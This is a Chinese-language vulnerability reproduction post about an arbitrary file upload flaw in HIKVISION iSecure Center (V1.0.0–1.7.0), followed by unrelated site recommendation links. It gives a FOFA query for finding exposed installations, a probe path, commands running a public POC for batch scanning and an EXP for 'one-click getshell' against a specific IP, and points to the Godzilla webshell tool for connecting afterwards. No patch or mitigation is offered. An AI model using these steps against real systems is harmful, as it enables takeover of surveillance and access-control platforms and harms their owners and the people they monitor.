海康威视综合安防管理平台任意文件上传

系统介绍

HIKVISION iSecure Center综合安防管理平台是一套"集成化"、"智能化"的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,公众号:web安全工具库,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于"统一软件技术架构"先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。

影响范围

iSecure Center(V1.0.0 - V1.7.0 )

复现环境

FOFA:app="HIKVISION-iSecure-Center"

漏洞复现

ip:port/center/api/files;.js

若出现此页面,则可能存在漏洞

工具快速复现

poc采用无害化扫描检测,无文件残留,可批量检测;exp只做单个url攻击,一键shell

GitHub - xwna/HIKVISION_iSecure_Center-RCE: HIKVISION iSecure Center RCE 海康威视综合安防管理平台任意文件上传 POC&EXP(一键getshell)

POC:

python3 iSecure-Center-RCE_POC.py -f URL.txt

EXP:

python3 iSecure-Center-RCE_EXP.py -u https://182.19.10.99

通过哥斯拉工具连接

下载

GitHub - BeichenDream/Godzilla: 哥斯拉

还可以通过手工修改数据包方式上传。

相关推荐
泯泷2 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt4 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab9 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31112 天前
VPN 与内网穿透
安全
Mr_愚人派13 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao14 天前
【无标题】
人工智能·安全
Alsn8614 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院14 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全